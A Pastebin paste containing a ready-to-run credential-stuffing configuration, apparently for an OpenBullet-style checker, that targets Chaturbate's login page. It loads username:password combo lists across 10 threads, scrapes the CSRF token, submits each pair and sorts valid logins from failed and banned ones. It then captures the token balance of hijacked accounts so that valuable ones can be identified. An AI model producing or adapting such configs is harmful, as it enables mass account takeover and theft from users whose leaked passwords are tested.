Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "General": {
- "name": "Chaturbate",
- "proxyType": "Proxyless",
- "comboType": "Username:Password",
- "threads": 10
- },
- "Requests": [
- {
- "actionUrl": "https://en.chaturbate.com/auth/login/",
- "method": "GET",
- "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
- "contentType": "",
- "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
- "referer": "",
- "successKeys": [
- "Forgot password?"
- ],
- "variables": [
- {
- "name": "csrf",
- "type": "Regex",
- "pattern": "name='csrfmiddlewaretoken' value='([^']*)",
- "usedFor": "postData"
- }
- ]
- },
- {
- "actionUrl": "https://en.chaturbate.com/auth/login/",
- "method": "POST",
- "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
- "contentType": "application/x-www-form-urlencoded",
- "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
- "referer": "https://en.chaturbate.com/auth/login/",
- "postData": 'next=&csrfmiddlewaretoken=+csrf+&username=<USER>&password=<PASS>',
- "successKeys": [
- "LOG OUT"
- ],
- "failureKeys": [
- "Please correct the errors below.",
- "<title>Account Banned - Chaturbate</title>"
- ]
- },
- {
- "actionUrl": "https://en.chaturbate.com/",
- "method": "GET",
- "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
- "contentType": "",
- "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
- "referer": "https://en.chaturbate.com/auth/login/?next=/",
- "successKeys": [
- 'You have:'
- ],
- "failureKeys": [
- "Forgot password?",
- "span class='tokencount'>0<",
- "span class='tokencount'>-"
- ],
- "captureParse": {
- "patterns": [
- {
- "pattern": "span class='tokencount'>([^<]*)<",
- "returnString": "+1+ Tokens"
- }
- ]
- }
- }
- ]
- }
Advertisement
Add Comment
Please, Sign In to add comment